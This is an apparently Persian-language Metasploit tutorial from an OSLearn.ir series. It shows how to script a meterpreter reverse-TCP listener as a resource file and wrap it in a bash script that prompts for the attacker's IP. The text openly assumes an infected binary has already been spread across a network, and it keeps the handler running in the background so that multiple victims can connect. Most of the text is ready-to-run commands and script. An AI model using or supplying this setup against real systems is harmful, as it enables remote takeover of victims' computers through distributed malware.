سلام دوستان . قسمت سوم آموزش های متااسپلویت را در پیش رو داریم . در این قسمت در مورد نوشتن اسکریپت های meterpreter صحبت خواهیم کرد و در آخر با استفاده از bash یک اسکریپت کوچیک آماده می کنیم . یکی دیگر از قابلیت های متااسپلویت این است که می توان اسکریپتی تهیه کرد و تمامی مراحل و کار هایی را که در ذهن داریم را به صورت خودکار پشت سر هم انجام دهیم .
یعنی دقیقا دستور هایی که قرار است در کنسول متااسپلویت زده شود را در یک فایل می نویسیم و سپس آن را اجرا می کنیم . نتیجه این خواهد شد که دستورات و کار هایی که در ذهن داشتیم پشت سر هم اجرا می شود و دیگر نیاز به تایپ مجدد نیست .
لازم به ذکر است که با این روش می توان اسکریپت های زیادی را بوجود آورد .
برای مثال فرض کنید که فایلی باینری و آلوده ساخته ایم و ( با هر روشی ) آن را در سطح شبکه پخش کرده ایم . حال لازم است سیستم خودمون رو روی حالت listening قرار دهیم و منتظر متصل شدن قربانی ها باشیم . با استفاده از اسکریپت نویسی کار خود را به شکل زیر پیش می بریم :
1. ابتدا یک فایل با نام meterpreter.rc در دایرکتوری جاری ایجاد می کنیم :
root@kali:~# touch meterpreter.rc
2. سپس exploit مورد نظر خودمون رو داخل این فایل اضافه می کنیم :
root@kali:~# echo use exploit/multi/handler >> meterpreter.rc
3. و همین طور payload ای که فایل باینری را با آن ایجاد کردیم را اضافه می کنیم :
root@kali:~# echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
4. در مرحله ی بعد باید آدرس آی پی سیستم خودمون رو اضافه کنیم :
root@kali:~# echo set LHOST 192.168.1.184 >> meterpreter.rc
5. و برای این که session ایجاد شده از بین نرود به صورت زیر عمل خواهیم کرد :
root@kali:~# echo set ExitOnSession false >> meterpreter.rc
6. و در نهایت مراحل را با دو سویچ j- و z- تکمیل می کنیم :
root@kali:~# echo exploit -j -z >> meterpreter.rc
در آخر برای اجرای این اسکریپت کافیست آن را به شکل زیر اجرا کنیم :
root@kali:~# msfconsole -r meterpreter.rc
نکته : سویچ j و z باعث شد تا session ایجاد شده بین قربانی و مهاجم در background باز شود تا دیگر قربانی ها هم بتوانند متصل شوند .
در آخر برای مشاهده ی session های ایجاد شده کافیست از دستور زیر استفاده کنیم :
msf exploit(handler) > sessions -l
می توان از این هم جلوتر رفت و با استفاده از bash یک اسکریپت کوچیک آماده کرد که هر بار لازم نباشد مرحله ی شماره ی 4 را دستی ویرایش و set کنیم . یعنی اسکریپتی آماده کنیم پس اجرا آدرس سیستم را از ما سوال کند !
برای این منظور به شکل زیر عمل می کنیم :
########################################################################### # # http://OSLearn.ir # E2MA3N # ########################################################################### #! /bin/bash ########################################################################### # echo use exploit/multi/handler > /tmp/meterpreter.rc echo set PAYLOAD windows/meterpreter/reverse_tcp >> /tmp/meterpreter.rc echo -n "[*] Enter attacker IP : " ; read lhost echo set LHOST $lhost >> /tmp/meterpreter.rc echo set ExitOnSession false >> /tmp/meterpreter.rc echo exploit -j -z >> /tmp/meterpreter.rc sleep 0.5 echo -e "[*]" sleep 2 echo -e "[*] Create meterpreter.rc" sleep 2 echo -e "[*] Run metasploit" sleep 1 msfconsole -r /tmp/meterpreter.rc # ###########################################################################
حال همانند دیگر اسکریپت ها پرمیشن اجرا به این اسکریپت می دهیم :
root@kali:~# chmod +x MSF.sh
و در نهایت آن را به شکل زیر اجرا می کنیم :
root@kali:~# ./MSF.sh
موفق و موید باشید
منبع : او اس لرن دات آی آر | http://OSLearn.ir
نویسنده : E2MA3N